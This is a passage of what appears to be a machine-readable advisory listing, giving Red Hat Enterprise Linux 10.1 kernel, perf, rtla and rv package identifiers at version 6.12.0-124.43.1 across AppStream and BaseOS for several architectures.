"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
